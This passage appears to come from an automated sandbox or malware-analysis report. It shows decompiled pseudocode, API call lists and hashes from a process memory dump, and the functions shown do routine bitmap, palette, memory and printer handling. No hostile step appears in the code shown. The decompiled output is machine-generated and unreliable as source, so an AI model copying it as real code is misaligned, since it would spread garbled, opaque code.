                                  					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
                                  					if(_v44 == 0) {
                                  						if(GetLastError() != 0) {
                                  							E0040E138(_t255, _t273, _t327, _t331);
                                  						} else {
                                  							E004297B4();
                                  						}
                                  					}
                                  					_pop(_t305);
                                  					 *[fs:eax] = _t305;
                                  					_push(0x42e2fe);
                                  					if(_v56 != 0) {
                                  						SelectPalette(_v20, _v56, 0xffffffff);
                                  					}
                                  					return DeleteObject(SelectObject(_v20, _v48));
                                  				}
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0042E1BA
                                  • CreateCompatibleDC.GDI32(00000001), ref: 0042E21F
                                  • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0042E234
                                  • SelectObject.GDI32(?,00000000), ref: 0042E23E
                                  • SelectPalette.GDI32(?,?,00000000), ref: 0042E26E
                                  • RealizePalette.GDI32(?), ref: 0042E27A
                                  • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042E29E
                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042E2F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042E2AC
                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 0042E2DE
                                  • SelectObject.GDI32(?,?), ref: 0042E2EB
                                  • DeleteObject.GDI32(00000000), ref: 0042E2F1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                  • String ID: ($BM
                                  • API String ID: 2831685396-2980357723
                                  • Opcode ID: 9c7fe991dda08225ffdb977d68124e940ddfb53c0a0babfe655e17e302625852
                                  • Instruction ID: 191eff5a0c995ec35fd90cac0cd5daf5328e793263a3d15047b131ae248ff625
                                  • Opcode Fuzzy Hash: 9c7fe991dda08225ffdb977d68124e940ddfb53c0a0babfe655e17e302625852
                                  • Instruction Fuzzy Hash: 98D14D70B002189FDF04DFA9D885AAEBBB5EF48304F54846AF905EB395D7389841CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E0046A2E8(intOrPtr __eax, char __edx) {
                                  				intOrPtr _v8;
                                  				char _v9;
                                  				intOrPtr* _v16;
                                  				intOrPtr* _v20;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				char _v44;
                                  				char _v60;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __ebp;
                                  				signed int _t170;
                                  				signed int _t176;
                                  				void* _t209;
                                  				void* _t213;
                                  				intOrPtr _t218;
                                  				intOrPtr _t241;
                                  				void* _t254;
                                  				struct HDC__* _t273;
                                  				struct HDC__* _t287;
                                  				void* _t327;
                                  				void* _t348;
                                  				void* _t365;
                                  				void* _t372;
                                  				intOrPtr _t387;
                                  				intOrPtr _t393;
                                  				struct HDC__* _t397;
                                  				struct HDC__* _t398;
                                  				struct HDC__* _t399;
                                  				void* _t426;
                                  				void* _t427;
                                  				void* _t428;
                                  				intOrPtr _t452;
                                  				intOrPtr _t469;
                                  				void* _t483;
                                  				int _t491;
                                  				int _t496;
                                  				void* _t498;
                                  				void* _t500;
                                  				intOrPtr _t501;
                                  				void* _t511;
                                  
                                  				_t498 = _t500;
                                  				_t501 = _t500 + 0xffffffc8;
                                  				_v9 = __edx;
                                  				_v8 = __eax;
                                  				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
                                  					_v9 = 0;
                                  				}
                                  				_t393 =  *((intOrPtr*)(_v8 + 0xc));
                                  				if(_t393 != 0xffffffff) {
                                  					L24:
                                  					return _t393;
                                  				} else {
                                  					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                  					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
                                  						goto L24;
                                  					} else {
                                  						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                  						asm("cdq");
                                  						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
                                  						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
                                  						if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                  							_t508 =  *0x4a10a0;
                                  							if( *0x4a10a0 == 0) {
                                  								 *0x4a10a0 = E00469FE0(1);
                                  							}
                                  							_t387 =  *0x4a10a0; // 0x0
                                  							 *((intOrPtr*)(_v8 + 8)) = E0046A054(_t387, _t496, _t491);
                                  						}
                                  						_v16 = E0042D2EC(1);
                                  						 *[fs:eax] = _t501;
                                  						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x46a897, _t498);
                                  						 *((intOrPtr*)( *_v16 + 0x34))();
                                  						E0041B1E4(0, _t393, _t491, 0,  &_v44, _t496);
                                  						E00428C64( *((intOrPtr*)(E0042D8BC(_v16) + 0x14)), _t491, 0xff00000f, _t491, _t498, _t508);
                                  						E0042D07C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
                                  						 *((intOrPtr*)( *_v16 + 0x38))();
                                  						_t395 = _v9;
                                  						if(_v9 >=  *(_v8 + 0x20)) {
                                  							_t395 = 0;
                                  						}
                                  						E0041B1E4(0 * _t491, _t395, 1 * _t491, 0,  &_v60, _t496);
                                  						_t209 = _v9 - 1;
                                  						_t511 = _t209;
                                  						if(_t511 < 0) {
                                  							L14:
                                  							_push( &_v60);
                                  							_t213 = E0042D8BC( *((intOrPtr*)(_v8 + 4)));
                                  							E00428ED4(E0042D8BC(_v16),  &_v44, _t512, _t213);
                                  							_t218 =  *((intOrPtr*)(_v8 + 4));
                                  							_t513 =  *((char*)(_t218 + 0x38)) - 1;
                                  							if( *((char*)(_t218 + 0x38)) != 1) {
                                  								 *((intOrPtr*)(_v8 + 0xc)) = E00469F84( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
                                  							} else {
                                  								 *((intOrPtr*)(_v8 + 0xc)) = E00469F84( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
                                  							}
                                  							goto L23;
                                  						} else {
                                  							if(_t511 == 0) {
                                  								_v24 = 0;
                                  								_v20 = 0;
                                  								 *[fs:eax] = _t501;
                                  								_v24 = E0042D2EC(1);
                                  								_v20 = E0042D2EC(1);
                                  								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x46a85b, _t498);
                                  								 *((intOrPtr*)( *_v20 + 0x6c))();
                                  								_t241 = _v8;
                                  								__eflags =  *((char*)(_t241 + 0x20)) - 1;
                                  								if( *((char*)(_t241 + 0x20)) <= 1) {
                                  									 *((intOrPtr*)( *_v24 + 8))();
                                  									 *((intOrPtr*)( *_v24 + 0x6c))();
                                  									E00428C64( *((intOrPtr*)(E0042D8BC(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
                                  									_t420 =  *_v24;
                                  									 *((intOrPtr*)( *_v24 + 0x40))();
                                  									_t254 = E0042D978(_v24);
                                  									__eflags = _t254;
                                  									if(_t254 != 0) {
                                  										E00428490( *((intOrPtr*)(E0042D8BC(_v24) + 0xc)), 0xffffff);
                                  										__eflags = 0;
                                  										E0042E778(_v24, 0);
                                  										E00428C64( *((intOrPtr*)(E0042D8BC(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
                                  									}
                                  									E0042E778(_v24, 1);
                                  									_t396 = E0042D8BC(_v16);
                                  									E00428C64( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff00000f, _t491, _t498, __eflags);
                                  									E00429008(_t258,  &_v44);
                                  									E00428C64( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff000014, _t491, _t498, __eflags);
                                  									SetTextColor(E004294DC(_t396), 0);
                                  									SetBkColor(E004294DC(_t396), 0xffffff);
                                  									_t273 = E004294DC(E0042D8BC(_v24));
                                  									BitBlt(E004294DC(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
                                  									E00428C64( *((intOrPtr*)(_t396 + 0x14)), _t420, 0xff000010, _t491, _t498, __eflags);
                                  									SetTextColor(E004294DC(_t396), 0);
                                  									SetBkColor(E004294DC(_t396), 0xffffff);
                                  									_t287 = E004294DC(E0042D8BC(_v24));
                                  									BitBlt(E004294DC(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
                                  								} else {
                                  									_v28 = E0042D8BC(_v16);
                                  									E0042D8BC(_v20);
                                  									E00428ED4(_v28,  &_v44, __eflags,  &_v60);
                                  									E0042E778(_v24, 1);
                                  									 *((intOrPtr*)( *_v24 + 0x40))();
                                  									 *((intOrPtr*)( *_v24 + 0x34))();
                                  									E00428C64( *((intOrPtr*)(E0042D8BC(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
                                  									_push( &_v60);
                                  									_push(E0042D8BC(_v20));
                                  									_t327 = E0042D8BC(_v24);
                                  									_pop(_t426);
                                  									E00428ED4(_t327,  &_v44, __eflags);
                                  									E00428C64( *((intOrPtr*)(_v28 + 0x14)), _t426, 0xff000014, _t491, _t498, __eflags);
                                  									_t397 = E004294DC(_v28);
                                  									SetTextColor(_t397, 0);
                                  									SetBkColor(_t397, 0xffffff);
                                  									BitBlt(_t397, 0, 0, _t491, _t496, E004294DC(E0042D8BC(_v24)), 0, 0, 0xe20746);
                                  									E00428C64( *((intOrPtr*)(E0042D8BC(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
                                  									_push( &_v60);
                                  									_push(E0042D8BC(_v20));
                                  									_t348 = E0042D8BC(_v24);
                                  									_pop(_t427);
                                  									E00428ED4(_t348,  &_v44, __eflags);
                                  									E00428C64( *((intOrPtr*)(_v28 + 0x14)), _t427, 0xff000010, _t491, _t498, __eflags);
                                  									_t398 = E004294DC(_v28);
                                  									SetTextColor(_t398, 0);
                                  									SetBkColor(_t398, 0xffffff);
                                  									BitBlt(_t398, 0, 0, _t491, _t496, E004294DC(E0042D8BC(_v24)), 0, 0, 0xe20746);
                                  									_push(E00427FD0( *((intOrPtr*)(_v8 + 0x1c))));
                                  									_t365 = E0042D8BC(_v20);
                                  									_pop(_t483);
                                  									E00428C64( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
                                  									_push( &_v60);
                                  									_push(E0042D8BC(_v20));
                                  									_t372 = E0042D8BC(_v24);
                                  									_pop(_t428);
                                  									E00428ED4(_t372,  &_v44, __eflags);
                                  									E00428C64( *((intOrPtr*)(_v28 + 0x14)), _t428, 0xff00000f, _t491, _t498, __eflags);
                                  									_t399 = E004294DC(_v28);
                                  									SetTextColor(_t399, 0);
                                  									SetBkColor(_t399, 0xffffff);
                                  									BitBlt(_t399, 0, 0, _t491, _t496, E004294DC(E0042D8BC(_v24)), 0, 0, 0xe20746);
                                  								}
                                  								__eflags = 0;
                                  								_pop(_t469);
                                  								 *[fs:eax] = _t469;
                                  								_push(0x46a862);
                                  								E0040360C(_v20);
                                  								return E0040360C(_v24);
                                  							} else {
                                  								_t512 = _t209 - 0xffffffffffffffff;
                                  								if(_t209 - 0xffffffffffffffff < 0) {
                                  									goto L14;
                                  								}
                                  								L23:
                                  								_pop(_t452);
                                  								 *[fs:eax] = _t452;
                                  								_push(0x46a89e);
                                  								return E0040360C(_v16);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}
                                  0x0046a54b
                                  0x0046a555
                                  0x0046a568
                                  0x0046a570
                                  0x0046a579
                                  0x0046a57d
                                  0x0046a585
                                  0x0046a586
                                  0x0046a596
                                  0x0046a5a3
                                  0x0046a5a8
                                  0x0046a5b3
                                  0x0046a5d6
                                  0x0046a5eb
                                  0x0046a5f3
                                  0x0046a5fc
                                  0x0046a600
                                  0x0046a608
                                  0x0046a609
                                  0x0046a619
                                  0x0046a626
                                  0x0046a62b
                                  0x0046a636
                                  0x0046a659
                                  0x0046a669
                                  0x0046a66d
                                  0x0046a675
                                  0x0046a676
                                  0x0046a67e
                                  0x0046a687
                                  0x0046a68b
                                  0x0046a693
                                  0x0046a694
                                  0x0046a6a4
                                  0x0046a6b1
                                  0x0046a6b6
                                  0x0046a6c1
                                  0x0046a6e4
                                  0x0046a6e4
                                  0x0046a83d
                                  0x0046a83f
                                  0x0046a842
                                  0x0046a845
                                  0x0046a84d
                                  0x0046a85a
                                  0x0046a43c
                                  0x0046a43d
                                  0x0046a43f
                                  0x00000000
                                  0x00000000
                                  0x0046a881
                                  0x0046a883
                                  0x0046a886
                                  0x0046a889
                                  0x0046a896
                                  0x0046a896
                                  0x0046a43a
                                  0x0046a438
                                  0x0046a339

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4cbb1735cbabb15cce69cd6fe50ae8d3e471d40b39edd57f7847610ddc642dc
                                  • Instruction ID: 7ceaf5a3774ae82af15735474f7612c65935a98d771803492a24906e5b4cbc64
                                  • Opcode Fuzzy Hash: d4cbb1735cbabb15cce69cd6fe50ae8d3e471d40b39edd57f7847610ddc642dc
                                  • Instruction Fuzzy Hash: 7F024174B00115AFDB00FB69D986E9E7BF5AF48304F50806AF511EB392CA79ED01CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0042D5EC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				struct HPALETTE__* _v12;
                                  				char _v13;
                                  				struct tagPOINT _v21;
                                  				struct HDC__* _v28;
                                  				void* _v32;
                                  				struct HPALETTE__* _t78;
                                  				signed int _t84;
                                  				signed int _t85;
                                  				signed int _t86;
                                  				char _t87;
                                  				void* _t94;
                                  				void* _t140;
                                  				intOrPtr* _t170;
                                  				intOrPtr _t178;
                                  				intOrPtr _t182;
                                  				intOrPtr _t184;
                                  				intOrPtr _t186;
                                  				int* _t190;
                                  				intOrPtr _t192;
                                  				void* _t194;
                                  				void* _t195;
                                  				intOrPtr _t196;
                                  
                                  				_t171 = __ecx;
                                  				_t194 = _t195;
                                  				_t196 = _t195 + 0xffffffe4;
                                  				_t190 = __ecx;
                                  				_v8 = __edx;
                                  				_t170 = __eax;
                                  				_t192 =  *((intOrPtr*)(__eax + 0x28));
                                  				_t178 =  *0x42d838; // 0xf
                                  				E004295B0(_v8, __ecx, _t178);
                                  				E0042DC68(_t170);
                                  				_v12 = 0;
                                  				_v13 = 0;
                                  				_t78 =  *(_t192 + 0x10);
                                  				if(_t78 != 0) {
                                  					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
                                  					RealizePalette( *(_v8 + 4));
                                  					_v13 = 1;
                                  				}
                                  				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                                  				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
                                  				_pop(_t85);
                                  				_t86 = _t85 * _t84;
                                  				if(_t86 > 8) {
                                  					L4:
                                  					_t87 = 0;
                                  				} else {
                                  					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
                                  					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
                                  						_t87 = 1;
                                  					} else {
                                  						goto L4;
                                  					}
                                  				}
                                  				if(_t87 == 0) {
                                  					if(E0042D978(_t170) == 0) {
                                  						SetStretchBltMode(E004294DC(_v8), 3);
                                  					}
                                  				} else {
                                  					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                  					SetStretchBltMode( *(_v8 + 4), 4);
                                  					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                  				}
                                  				_push(_t194);
                                  				_push(0x42d828);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t196;
                                  				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
                                  					E0042DC08(_t170, _t171);
                                  				}
                                  				_t94 = E0042D8BC(_t170);
                                  				_t182 =  *0x42d838; // 0xf
                                  				E004295B0(_t94, _t171, _t182);
                                  				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
                                  					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E0042D8BC(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
                                  					_pop(_t184);
                                  					 *[fs:eax] = _t184;
                                  					_push(0x42d82f);
                                  					if(_v13 != 0) {
                                  						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                                  					}
                                  					return 0;
                                  				} else {
                                  					_v32 = 0;
                                  					_v28 = 0;
                                  					_push(_t194);
                                  					_push(0x42d7bd);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t196;
                                  					_v28 = E004298D4(CreateCompatibleDC(0));
                                  					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
                                  					E00429A78( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E0042D8BC(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
                                  					_t140 = 0;
                                  					_pop(_t186);
                                  					 *[fs:eax] = _t186;
                                  					_push(0x42d802);
                                  					if(_v32 != 0) {
                                  						_t140 = SelectObject(_v28, _v32);
                                  					}
                                  					if(_v28 != 0) {
                                  						return DeleteDC(_v28);
                                  					}
                                  					return _t140;
                                  				}
                                  			}



























                                  APIs
                                    • Part of subcall function 0042DC68: GetDC.USER32(00000000), ref: 0042DCBE
                                    • Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042DCD3
                                    • Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042DCDD
                                    • Part of subcall function 0042DC68: CreateHalftonePalette.GDI32(00000000), ref: 0042DD01
                                    • Part of subcall function 0042DC68: ReleaseDC.USER32(00000000,00000000), ref: 0042DD0C
                                  • SelectPalette.GDI32(?,?,000000FF), ref: 0042D62E
                                  • RealizePalette.GDI32(?), ref: 0042D63D
                                  • GetDeviceCaps.GDI32(?,0000000C), ref: 0042D64F
                                  • GetDeviceCaps.GDI32(?,0000000E), ref: 0042D65E
                                  • GetBrushOrgEx.GDI32(?,?), ref: 0042D691
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 0042D69F
                                  • SetBrushOrgEx.GDI32(?,?,?,?), ref: 0042D6B7
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0042D6D4
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0042D734
                                  • SelectObject.GDI32(?,?), ref: 0042D749
                                  • SelectObject.GDI32(?,00000000), ref: 0042D7A8
                                  • DeleteDC.GDI32(00000000), ref: 0042D7B7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                  • String ID:
                                  • API String ID: 2414602066-0
                                  • Opcode ID: 7a98a3f2e09b9d38d6172e34fa7d17b446c01a0214f7e65f123b6915a1faa537
                                  • Instruction ID: 4dfe927d54ef61a1620e5a7498f143fb1f85de4b4f64e0ec3f3a148cda2e4f7b
                                  • Opcode Fuzzy Hash: 7a98a3f2e09b9d38d6172e34fa7d17b446c01a0214f7e65f123b6915a1faa537
                                  • Instruction Fuzzy Hash: 1D715875B00205AFDB10EFA9D985F5AB7F8AF08304F51846AF509E7381D638ED00CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00431DB8(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr* _v20;
                                  				char _v176;
                                  				char _v180;
                                  				char _v184;
                                  				char _v188;
                                  				intOrPtr _v192;
                                  				char _v196;
                                  				char _v200;
                                  				void* _t73;
                                  				long _t76;
                                  				intOrPtr _t85;
                                  				long _t95;
                                  				void* _t96;
                                  				long _t98;
                                  				intOrPtr _t112;
                                  				void* _t134;
                                  				void* _t135;
                                  				void* _t136;
                                  				intOrPtr _t138;
                                  				intOrPtr _t152;
                                  				void* _t169;
                                  				void* _t170;
                                  				void* _t171;
                                  				void* _t173;
                                  				void* _t176;
                                  
                                  				_t167 = __edi;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v180 = 0;
                                  				_v184 = 0;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t173 = __eax;
                                  				_t134 = _a4;
                                  				_push(_t176);
                                  				_push(0x431ff9);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t176 + 0xffffff3c;
                                  				E00431C20(__eax, 0);
                                  				_t73 =  *(_t173 + 0x28);
                                  				if(_t134 != _t73) {
                                  					 *(_t173 + 0x28) = _t134;
                                  				}
                                  				_t135 =  *(_t173 + 0x28);
                                  				if(_t135 != 0) {
                                  					GlobalFix(_t135);
                                  					_t167 = _t73;
                                  					 *(_t173 + 0x24) = _t73;
                                  					E00431D7C(_t173,  *((intOrPtr*)(_t73 + 0x28)));
                                  				}
                                  				E0043251C(_t173);
                                  				_t76 =  *(_t173 + 0x2c);
                                  				if(_t76 != 0) {
                                  					_push(_t76);
                                  					L0043157C();
                                  					 *(_t173 + 0x2c) = 0;
                                  				}
                                  				E00431AF4(_t173, _t135, 0, _t167, _t173);
                                  				_v16 = 0xffffffff;
                                  				_v20 = E00432090(_t173, _t135, _t167, _t173);
                                  				_t169 =  *((intOrPtr*)( *_v20 + 0x14))() - 1;
                                  				if(_t169 < 0) {
                                  					L13:
                                  					if(_v16 == 0xffffffff) {
                                  						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x14))();
                                  						_t112 =  *0x4bad64; // 0x426474
                                  						E0040656C(_t112, _v12,  &_v184);
                                  						_v200 = _v8;
                                  						_v196 = 6;
                                  						_v192 = _a8;
                                  						_v188 = 6;
                                  						E00409B8C(_v184, 1,  &_v200,  &_v180);
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x3c))(E004317A0(_v12, 1, _a8, _v8));
                                  					}
                                  					 *((intOrPtr*)(_t173 + 0x14)) = _v16;
                                  					_push(0);
                                  					_push(_t173 + 0x2c);
                                  					_t85 = _v8;
                                  					_push(_t85);
                                  					L00431594();
                                  					if(_t85 != 0) {
                                  						if( *(_t173 + 0x28) == 0) {
                                  							_push(0);
                                  							_push( &_v176);
                                  							_push( &_v176);
                                  							_push(_v8);
                                  							_t95 =  *(_t173 + 0x2c);
                                  							_push(_t95);
                                  							_push(0);
                                  							L00431584();
                                  							_t96 = GlobalAlloc(0x42, _t95);
                                  							_t136 = _t96;
                                  							 *(_t173 + 0x28) = _t136;
                                  							if(_t136 != 0) {
                                  								GlobalFix(_t136);
                                  								_t170 = _t96;
                                  								 *(_t173 + 0x24) = _t170;
                                  								_push(2);
                                  								_push(_t170);
                                  								_push(_t170);
                                  								_push(_v8);
                                  								_t98 =  *(_t173 + 0x2c);
                                  								_push(_t98);
                                  								_push(0);
                                  								L00431584();
                                  								if(_t98 < 0) {
                                  									GlobalUnWire( *(_t173 + 0x28));
                                  									GlobalFree( *(_t173 + 0x28));
                                  									 *(_t173 + 0x28) = 0;
                                  									 *(_t173 + 0x24) = 0;
                                  								}
                                  							}
                                  						}
                                  						if( *(_t173 + 0x28) != 0) {
                                  							E00431D7C(_t173,  *((intOrPtr*)( *(_t173 + 0x24) + 0x28)));
                                  						}
                                  					}
                                  					_pop(_t152);
                                  					 *[fs:eax] = _t152;
                                  					_push(0x432000);
                                  					return E004043FC( &_v184, 2);
                                  				} else {
                                  					_t171 = _t169 + 1;
                                  					_t138 = 0;
                                  					while(E00431800( *((intOrPtr*)( *_v20 + 0x18))(), _t138, _v8, _t173, _a8) == 0) {
                                  						_t138 = _t138 + 1;
                                  						_t171 = _t171 - 1;
                                  						if(_t171 != 0) {
                                  							continue;
                                  						}
                                  						goto L13;
                                  					}
                                  					E004045D0( *((intOrPtr*)( *_v20 + 0x18))() + 0xc, _a8);
                                  					_v16 = _t138;
                                  					goto L13;
                                  				}
                                  			}
































                                  APIs
                                  • GlobalUnWire.KERNEL32(?), ref: 00431E00
                                  • GlobalFree.KERNEL32(?), ref: 00431E09
                                  • GlobalFix.KERNEL32(?), ref: 00431E1E
                                  • 738ECAE7.WINSPOOL.DRV(?,00000000,00431FF9,?,00000000,00000000,00000000), ref: 00431E41
                                  • 738D74D6.WINSPOOL.DRV(?,?,00000000,?,00000000,00000000,00000000), ref: 00431F47
                                  • 738DA642.WINSPOOL.DRV(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00431F74
                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00431F7C
                                  • GlobalFix.KERNEL32(00000000), ref: 00431F8B
                                  • 738DA642.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,00000042,00000000,00000000,?,?,?,?,00000000), ref: 00431FA3
                                  • GlobalUnWire.KERNEL32(00000000), ref: 00431FB0
                                  • GlobalFree.KERNEL32(00000000), ref: 00431FB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Global$A642.FreeWire$Alloc
                                  • String ID: tdB
                                  • API String ID: 3300168370-905615233
                                  • Opcode ID: 0490f039848640c9373674bf0be4d650096c151fb9ae2174f86e2dc1f8ee4a4a
                                  • Instruction ID: c5c23a21245c4ae09621134a60e7e1aae37a40248a86e59624358c1d98db7f41
                                  • Opcode Fuzzy Hash: 0490f039848640c9373674bf0be4d650096c151fb9ae2174f86e2dc1f8ee4a4a
                                  • Instruction Fuzzy Hash: 84710970A006049FDB20DF6AC881B5BB7F9AF4C314F10566AE949D73A1D738ED41CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E004298E4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				struct HBITMAP__* _v20;
                                  				struct HDC__* _v24;
                                  				struct HDC__* _v28;
                                  				struct HDC__* _v32;
                                  				int _v48;
                                  				int _v52;
                                  				void _v56;
                                  				void* _t78;
                                  				intOrPtr _t85;
                                  				intOrPtr _t86;
                                  				void* _t91;
                                  				void* _t93;
                                  				void* _t94;
                                  				intOrPtr _t95;
                                  
                                  				_t93 = _t94;
                                  				_t95 = _t94 + 0xffffffcc;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t77 = __ecx;
                                  				_v8 = __eax;
                                  				_v28 = CreateCompatibleDC(0);
                                  				_v32 = CreateCompatibleDC(0);
                                  				_push(_t93);
                                  				_push(0x429a32);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t95;
                                  				GetObjectA(_v8, 0x18,  &_v56);
                                  				if(__ecx == 0) {
